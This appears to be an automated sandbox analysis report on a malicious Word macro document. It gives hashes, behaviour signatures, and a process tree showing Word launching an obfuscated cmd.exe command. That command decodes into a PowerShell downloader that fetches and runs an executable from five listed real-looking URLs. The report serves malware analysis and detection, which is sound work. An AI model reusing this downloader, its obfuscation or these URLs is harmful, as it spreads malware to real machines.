Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/06/2024, 11:27

General

  • Target

    8a54539a4251fc17f2fbc7654d764f69_JaffaCakes118.doc

  • Size

    92KB

  • MD5

    8a54539a4251fc17f2fbc7654d764f69

  • SHA1

    f13e23f1cf0c3672cf2718ef2bcb46bae95d0326

  • SHA256

    98cca1bc8846fe485779bd685512aa6276623937dc0da0eef4ac8921dc8a0d5e

  • SHA512

    1815388e3c53a3a2ebce873cba57dfd6fc430a7214982e4e39e07218d77f4cc88af7f8b91379bb53b342784378edb58cec31563fcee1a4269a68c06661be251d

  • SSDEEP

    1536:dTxjwKZ09cB7y9ghN8+mQ90MTr+a9YHB8iNi5Lvx91:txjnB29gb8onYmiN2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rapidc.co.nz/mv

exe.dropper

http://www.hasekimuhendislik.com/Jd1V

exe.dropper

http://parisel.pl/JoOxUSZz

exe.dropper

http://imegica.com/xHG91B

exe.dropper

http://jdca.in/cu8shkw

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8a54539a4251fc17f2fbc7654d764f69_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1228
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V:/C"set IBr=XjMwiWBKhriXwVBMdbFYPPEJOUiOrkzZQPZa=u/2SD)oex,8vtpf-'Hn\.l:6{G@m;( 9c1syN+$C}g&&for %j in (50;43;12;44;28;71;8;44;58;58;67;75;30;23;30;36;55;44;12;52;43;17;1;44;69;49;67;73;44;49;57;5;44;17;76;58;26;44;55;49;65;75;51;13;30;36;53;8;49;49;50;59;38;38;28;35;50;26;16;69;57;69;43;57;55;30;38;64;48;63;8;49;49;50;59;38;38;12;12;12;57;8;35;71;44;29;26;64;37;8;44;55;16;26;71;58;26;29;57;69;43;64;38;23;16;70;13;63;8;49;49;50;59;38;38;50;35;28;26;71;44;58;57;50;58;38;23;43;27;45;25;40;34;30;63;8;49;49;50;59;38;38;26;64;44;78;26;69;35;57;69;43;64;38;45;54;62;68;70;14;63;8;49;49;50;59;38;38;1;16;69;35;57;26;55;38;69;37;47;71;8;29;12;53;57;40;50;58;26;49;66;53;63;53;42;65;75;25;14;40;67;36;67;53;68;39;60;53;65;75;27;26;55;36;75;44;55;48;59;49;44;64;50;74;53;56;53;74;75;25;14;40;74;53;57;44;45;44;53;65;51;43;28;44;35;69;8;66;75;33;55;64;67;26;55;67;75;51;13;30;42;61;49;28;72;61;75;30;23;30;57;41;43;12;55;58;43;35;16;18;26;58;44;66;75;33;55;64;46;67;75;27;26;55;42;65;40;49;35;28;49;52;33;28;43;69;44;71;71;67;75;27;26;55;65;17;28;44;35;29;65;77;69;35;49;69;8;61;77;77;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;67;89)do set b2nv=!b2nv!!IBr:~%j,1!&&if %j==89 call %b2nv:*b2nv!=%"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $zJz=new-object Net.WebClient;$fVz='http://rapidc.co.nz/mv@http://www.hasekimuhendislik.com/Jd1V@http://parisel.pl/JoOxUSZz@http://imegica.com/xHG91B@http://jdca.in/cu8shkw'.Split('@');$UBS = '926';$Oin=$env:temp+'\'+$UBS+'.exe';foreach($Pnm in $fVz){try{$zJz.DownloadFile($Pnm, $Oin);Start-Process $Oin;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2452

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\926.exe

          Filesize

          64B

          MD5

          c95fbd1477f9da6186459df807c8aa1a

          SHA1

          d332e3c524652d23ed7786cb41ebf6b6a7ed5db1

          SHA256

          f942985b605bccd455aadb769cbade3c23104829553832bfd4553b398a31f4cc

          SHA512

          66ced9c99728140c866b6d58d7e34b469533bad097f75be3e051cad87b1a9bfd736ce01ae5ec5a3518dfd4c5908a7fc529504fe37b3544b27ddf3d15695c0a65

        • C:\Users\Admin\AppData\Local\Temp\TCD7D99.tmp\iso690.xsl

          Filesize

          263KB

          MD5

          ff0e07eff1333cdf9fc2523d323dd654

          SHA1

          77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

          SHA256

          3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

          SHA512

          b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lx3sykjj.oiq.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1228-9-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-50-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-3-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-6-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-7-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-8-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-10-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-11-0x00007FFF21B20000-0x00007FFF21B30000-memory.dmp

          Filesize

          64KB

        • memory/1228-1-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-12-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-13-0x00007FFF21B20000-0x00007FFF21B30000-memory.dmp

          Filesize

          64KB

        • memory/1228-14-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-15-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-17-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-16-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-18-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-21-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-49-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-20-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-19-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-5-0x00007FFF63DAD000-0x00007FFF63DAE000-memory.dmp

          Filesize

          4KB

        • memory/1228-43-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-22-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-53-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-52-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-51-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-54-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-41-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-592-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-2-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-4-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-86-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-0-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-564-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-566-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-565-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-567-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-568-0x00007FFF63D10000-0x00007FFF63F05000-memory.dmp

          Filesize

          2.0MB

        • memory/1228-588-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-589-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-590-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/1228-591-0x00007FFF23D90000-0x00007FFF23DA0000-memory.dmp

          Filesize

          64KB

        • memory/2452-66-0x000001E01B3B0000-0x000001E01B3D2000-memory.dmp

          Filesize

          136KB